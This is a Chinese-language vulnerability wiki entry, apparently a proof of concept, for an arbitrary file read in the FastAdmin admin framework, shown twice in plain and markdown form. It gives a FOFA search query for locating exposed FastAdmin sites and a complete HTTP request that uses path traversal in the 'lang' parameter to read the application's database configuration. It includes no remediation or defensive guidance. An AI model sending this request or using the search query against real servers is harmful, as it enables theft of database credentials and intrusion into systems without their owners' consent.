fofamini-wiki

登录白背景

源码

Fastadmin框架存在任意文件读取漏洞

一、漏洞描述

FastAdmin是一款基于ThinkPHP+Bootstrap开发的快速后台开发框架，FastAdmin基于Apache2.0开源协议发布，免费且不限制商业使用，目前被广泛应用于各大行业应用后台管理。astAdmin框架存在任意文件读取漏洞，攻击者利用此漏洞可以获取系统敏感信息。

二、影响版本

Fastadmin

三、资产测绘

app="FASTADMIN-框架"

四、漏洞复现

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

原文: https://www.yuque.com/xiaokp7/ocvun2/lbfsfkgluxalb6da

# Fastadmin框架存在任意文件读取漏洞

### 一、漏洞描述
   FastAdmin是一款基于ThinkPHP+Bootstrap开发的快速后台开发框架，FastAdmin基于Apache2.0开源协议发布，免费且不限制商业使用，目前被广泛应用于各大行业应用后台管理。astAdmin框架存在任意文件读取漏洞，攻击者利用此漏洞可以获取系统敏感信息。

### 二、影响版本
Fastadmin

### 三、资产测绘
```plain
app="FASTADMIN-框架"
```

![1718438839630-97bac50c-a0df-4dc4-9799-87d00ce17960.png](./img/Cs630sRhH6K7YgWe/1718438839630-97bac50c-a0df-4dc4-9799-87d00ce17960-277675.png)

### 四、漏洞复现
```plain
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
```

![1718438902491-0675ae9c-90a4-4f44-aa07-fc2e21797b7c.png](./img/Cs630sRhH6K7YgWe/1718438902491-0675ae9c-90a4-4f44-aa07-fc2e21797b7c-538244.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lbfsfkgluxalb6da>